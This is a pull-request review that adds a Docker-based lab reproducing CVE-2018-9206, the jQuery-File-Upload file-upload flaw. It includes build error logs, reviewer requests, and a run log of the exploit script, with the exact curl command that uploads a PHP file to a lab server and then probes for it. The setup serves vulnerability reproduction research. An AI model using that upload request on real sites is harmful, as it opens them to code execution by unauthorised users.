### PR TITLE
Added CVE-2018-9206

### PR DESCRIPTION
**Pull request by justinthecao**
Created cvex yaml, ansible files, and populated data to run a docker poc of CVE-2018-9206 from https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206

### CODE REVIEW

File: CVE-2018-9206/ubuntu1.yml [hunk 1]
```diff
@@ -0,0 +1,41 @@
+---
+- name: Install CVE-2021-44228 PoC based off Tomcat
```
Comment (olegbck) [inline CVE-2018-9206/ubuntu1.yml:2]: Please change the name

**Comment by olegbck** [comment]
The VM snapshot "CVE-2018-9206/ubuntu1" must have the needed software installed and running. Please move the building and the execution of the Docker container from install.sh to ubuntu1.yml. 

install.sh outputs many errors during my tests:
`2024-11-04 13:31:48,909 - INFO - [ubuntu1] Executing '/opt/jquerydocker/install.sh'...
2024-11-04 13:32:29,996 - INFO - [ubuntu1] [*] Build and Run of vulnerable jQuery-File-Plugin (8.1.0, 9.0.0, 9.22.0, and 9.22.1). 9.22.1 is patched.
[*] Running docker
deee62f8aed4a8fe384611e2af5583c8614806f368e19a6b3078f77b1648de75
[*] Test now the following:
./CVE-2018-9206.sh http://localhost:8000/jQuery-File-Upload-8.1.0
./CVE-2018-9206.sh http://localhost:8000/jQuery-File-Upload-9.0.0
./CVE-2018-9206.sh http://localhost:8000/jQuery-File-Upload-9.22.0
./CVE-2018-9206.sh http://localhost:8000/jQuery-File-Upload-9.22.1

2024-11-04 13:32:29,997 - INFO - [ubuntu1] #0 building with "default" instance using docker driver

#1 [internal] load .dockerignore
#1 transferring context: 2B done
#1 DONE 0.0s

#2 [internal] load build definition from Dockerfile
#2 transferring dockerfile: 1.72kB done
#2 DONE 0.1s

#3 [internal] load metadata for docker.io/library/ubuntu:latest
#3 DONE 0.0s

#4 [1/6] FROM docker.io/library/ubuntu:latest
#4 DONE 0.3s

#5 [2/6] RUN apt-get update && apt-get -y upgrade && DEBIAN_FRONTEND=noninteractive apt-get -y install     apache2 php libapache2-mod-php wget tar unzip
#5 19.22 Ign:1 http://archive.ubuntu.com/ubuntu noble InRelease
#5 19.22 Ign:2 http://archive.ubuntu.com/ubuntu noble-updates InRelease
#5 19.22 Ign:3 http://archive.ubuntu.com/ubuntu noble-backports InRelease
#5 19.44 Ign:4 http://security.ubuntu.com/ubuntu noble-security InRelease
#5 20.22 Ign:1 http://archive.ubuntu.com/ubuntu noble InRelease
#5 20.22 Ign:2 http://archive.ubuntu.com/ubuntu noble-updates InRelease
#5 20.22 Ign:3 http://archive.ubuntu.com/ubuntu noble-backports InRelease
#5 20.48 Ign:4 http://security.ubuntu.com/ubuntu noble-security InRelease
#5 22.22 Ign:1 http://archive.ubuntu.com/ubuntu noble InRelease
#5 22.22 Ign:2 http://archive.ubuntu.com/ubuntu noble-updates InRelease
#5 22.22 Ign:3 http://archive.ubuntu.com/ubuntu noble-backports InRelease
#5 22.48 Ign:4 http://security.ubuntu.com/ubuntu noble-security InRelease
#5 26.23 Err:1 http://archive.ubuntu.com/ubuntu noble InRelease
#5 26.23   Could not connect to archive.ubuntu.com:80 (185.125.190.82). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (91.189.91.83). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (185.125.190.81). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (185.125.190.83). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (91.189.91.81). - connect (113: No route to host)
#5 26.23 Err:2 http://archive.ubuntu.com/ubuntu noble-updates InRelease
#5 26.23   Unable to connect to archive.ubuntu.com:http:
#5 26.23 Err:3 http://archive.ubuntu.com/ubuntu noble-backports InRelease
#5 26.23   Unable to connect to archive.ubuntu.com:http:
#5 26.49 Err:4 http://security.ubuntu.com/ubuntu noble-security InRelease
#5 26.49   Could not connect to security.ubuntu.com:80 (185.125.190.82). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (185.125.190.81). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (185.125.190.83). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (91.189.91.81). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (91.189.91.83). - connect (113: No route to host)
#5 26.50 Reading package lists...
#5 28.23 W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/noble/InRelease  Could not connect to archive.ubuntu.com:80 (185.125.190.82). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (91.189.91.83). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (185.125.190.81). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (185.125.190.83). - connect (113: No route to host) Could not connect to archive.ubuntu.com:80 (91.189.91.81). - connect (113: No route to host)
#5 28.23 W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/noble-updates/InRelease  Unable to connect to archive.ubuntu.com:http:
#5 28.23 W: Failed to fetch http://archive.ubuntu.com/ubuntu/dists/noble-backports/InRelease  Unable to connect to archive.ubuntu.com:http:
#5 28.23 W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/noble-security/InRelease  Could not connect to security.ubuntu.com:80 (185.125.190.82). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (185.125.190.81). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (185.125.190.83). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (91.189.91.81). - connect (113: No route to host) Could not connect to security.ubuntu.com:80 (91.189.91.83). - connect (113: No route to host)
#5 28.23 W: Some index files failed to download. They have been ignored, or old ones used instead.
#5 28.24 Reading package lists...
#5 30.07 Building dependency tree...
#5 30.39 Reading state information...
#5 30.49 Calculating upgrade...
#5 30.97 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
#5 30.98 Reading package lists...
#5 32.74 Building dependency tree...
#5 33.04 Reading state information...
#5 33.64 apache2 is already the newest version (2.4.58-1ubuntu8.4).
#5 33.64 php is already the newest version (2:8.3+93ubuntu2).
#5 33.64 libapache2-mod-php is already the newest version (2:8.3+93ubuntu2).
#5 33.64 wget is already the newest version (1.21.4-1ubuntu4.1).
#5 33.64 tar is already the newest version (1.35+dfsg-3build1).
#5 33.64 unzip is already the newest version (6.0-28ubuntu4.1).
#5 33.64 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
#5 DONE 33.7s

#6 [3/6] RUN a2enmod rewrite
#6 0.647 Module rewrite already enabled
#6 DONE 0.8s

#7 [4/6] RUN a2enmod headers
#7 0.840 Module headers already enabled
#7 DONE 0.9s

#8 [5/6] RUN cd /var/www/html &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz && tar -zxvf 8.1.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/9.0.0.tar.gz && tar -zxvf 9.0.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.0.tar.gz && tar -zxvf v9.22.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.1.tar.gz && tar -zxvf v9.22.1.tar.gz &&      wget http://github.com/blueimp/jQuery-File-Upload/zipball/9.7.2 -O v9.7.2.zip && unzip v9.7.2.zip
#8 0.526 --2024-11-04 12:32:14--  https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz
#8 0.625 Resolving github.com (github.com)... 140.82.121.4
#8 0.653 Connecting to github.com (github.com)|140.82.121.4|:443... connected.
#8 3.730 OpenSSL: error:0A000126:SSL routines::unexpected eof while reading
#8 3.731 Unable to establish SSL connection.
#8 ERROR: process "/bin/sh -c cd /var/www/html &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz && tar -zxvf 8.1.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/9.0.0.tar.gz && tar -zxvf 9.0.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.0.tar.gz && tar -zxvf v9.22.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.1.tar.gz && tar -zxvf v9.22.1.tar.gz &&      wget http://github.com/blueimp/jQuery-File-Upload/zipball/9.7.2 -O v9.7.2.zip && unzip v9.7.2.zip" did not complete successfully: exit code: 4
------
 > [5/6] RUN cd /var/www/html &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz && tar -zxvf 8.1.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/9.0.0.tar.gz && tar -zxvf 9.0.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.0.tar.gz && tar -zxvf v9.22.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.1.tar.gz && tar -zxvf v9.22.1.tar.gz &&      wget http://github.com/blueimp/jQuery-File-Upload/zipball/9.7.2 -O v9.7.2.zip && unzip v9.7.2.zip:
0.526 --2024-11-04 12:32:14--  https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz
140.82.121.4
0.653 Connecting to github.com (github.com)|140.82.121.4|:443... connected.
3.730 OpenSSL: error:0A000126:SSL routines::unexpected eof while reading
3.731 Unable to establish SSL connection.
------
Dockerfile:29
--------------------
  28 |     # Install releases
  29 | >>> RUN cd /var/www/html && \
  30 | >>>     wget https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz && tar -zxvf 8.1.0.tar.gz && \
  31 | >>>     wget https://github.com/blueimp/jQuery-File-Upload/archive/9.0.0.tar.gz && tar -zxvf 9.0.0.tar.gz && \
  32 | >>>     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.0.tar.gz && tar -zxvf v9.22.0.tar.gz && \
  33 | >>>     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.1.tar.gz && tar -zxvf v9.22.1.tar.gz && \
  34 | >>>      wget http://github.com/blueimp/jQuery-File-Upload/zipball/9.7.2 -O v9.7.2.zip && unzip v9.7.2.zip
  35 |     
--------------------
ERROR: failed to solve: process "/bin/sh -c cd /var/www/html &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/8.1.0.tar.gz && tar -zxvf 8.1.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/9.0.0.tar.gz && tar -zxvf 9.0.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.0.tar.gz && tar -zxvf v9.22.0.tar.gz &&     wget https://github.com/blueimp/jQuery-File-Upload/archive/v9.22.1.tar.gz && tar -zxvf v9.22.1.tar.gz &&      wget http://github.com/blueimp/jQuery-File-Upload/zipball/9.7.2 -O v9.7.2.zip && unzip v9.7.2.zip" did not complete successfully: exit code: 4
docker: Error response from daemon: driver failed programming external connectivity on endpoint quizzical_keller (7dda609ba3b8eeffc11f1e699f16a3266a90f4d0b5816d467f172d5091525a3a): Bind for 0.0.0.0:8000 failed: port is already allocated.`

However, the exploit seems to be working:
`2024-11-04 13:32:29,997 - INFO - [ubuntu2] Executing '/opt/exploit/CVE-2018-9206.sh http://192.168.56.3:8000/jQuery-File-Upload-9.22.0/'...
2024-11-04 13:33:14,559 - INFO - [ubuntu2] Preflight Check...
Found /usr/bin/curl Installation: OK
Found /usr/bin/jq Installation: OK
___________________________________________________________________________
|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206              |
|Checks for older versions of the code and upload an harmless file.        |
|                                                                          |
| @_larry0, @phackt_ul                                                     |
|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None). |
|__________________________________________________________________________|

[+] Checking variations :
[*] Testing... -> http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//server/php/upload.class.php
[*] Testing... -> http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//example/upload.php
[*] Testing... -> http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//server/php/UploadHandler.php
[+] Found Path: server/php/UploadHandler.php
[!] Found: Plugin version 9.22.0
[!] Found: http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//index.html is accessible
[+] Running /usr/bin/curl --connect-timeout 10 -sk -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" -F "files[]=@HZElIyHVPTNx.php" -F "filename=HZElIyHVPTNx.php" "http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//server/php/index.php"
[+] Testing path: http://192.168.56.3:8000/jQuery-File-Upload-9.22.0//server/php/files/HZElIyHVPTNx.php
[!] Found: http://192.168.56.3:8000/jQuery-File-Upload-9.22.0/ is vulnerable`

Does this mean the exploit suceeded:
`[!] Found: http://192.168.56.3:8000/jQuery-File-Upload-9.22.0/ is vulnerable`

File: CVE-2018-9206/ubuntu1.yml (hunk 1 above)
Comment (justinthecao) [reply CVE-2018-9206/ubuntu1.yml]: Fixed

**Comment by justinthecao** [comment]
I don't get those errors when I run it..

**Comment by olegbck** [comment]
The current setup is clean from errors, not sure what was it last time. Could you also please put v9.22.0.tar.gz to the data folder and use the local copy in the Dockerfile? Please do not download it.

**Comment by justinthecao** [comment]
Let me know if that works

**Pull request merged**